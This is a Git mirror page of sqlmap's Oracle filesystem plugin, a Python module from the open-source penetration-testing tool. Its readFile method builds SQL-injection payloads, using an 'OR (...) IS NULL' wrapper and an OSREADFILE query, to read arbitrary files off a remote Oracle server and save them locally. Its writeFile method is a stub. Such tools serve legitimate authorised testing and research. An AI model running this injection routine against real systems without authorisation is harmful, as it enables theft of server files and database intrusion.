sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-11-04 09:57:38 +03:00
Code Issues Packages Projects Releases Wiki Activity
854507bc85
sqlmap/plugins/dbms/oracle/filesystem.py
Miroslav Stampar 4efd745b5c Copyright year bump
2020-01-01 13:25:15 +01:00

60 lines
2.2 KiB
Python
Raw Blame History

#!/usr/bin/env python
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.agent import agent
from lib.core.common import dataToOutFile
from lib.core.common import decodeDbmsHexValue
from lib.core.common import getSQLSnippet
from lib.core.common import isNoneValue
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from lib.request.connect import Connect as Request
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def readFile(self, remoteFile):
localFilePaths = []
snippet = getSQLSnippet(DBMS.ORACLE, "read_file_export_extension")
for query in snippet.split("\n"):
query = query.strip()
query = agent.prefixQuery("OR (%s) IS NULL" % query)
query = agent.suffixQuery(query, trimEmpty=False)
payload = agent.payload(newValue=query)
Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)
for remoteFile in remoteFile.split(','):
if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg)
kb.fileReadMode = True
fileContent = inject.getValue("SELECT RAWTOHEX(OSREADFILE('%s')) FROM DUAL" % remoteFile, charsetType=CHARSET_TYPE.HEXADECIMAL)
kb.fileReadMode = False
if not isNoneValue(fileContent):
fileContent = decodeDbmsHexValue(fileContent, True)
if fileContent.strip():
localFilePath = dataToOutFile(remoteFile, fileContent)
localFilePaths.append(localFilePath)
elif not kb.bruteMode:
errMsg = "no data retrieved"
logger.error(errMsg)
return localFilePaths
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
errMsg = "File system write access not yet implemented for "
errMsg += "Oracle"
raise SqlmapUnsupportedFeatureException(errMsg)
Reference in New Issue View Git Blame Copy Permalink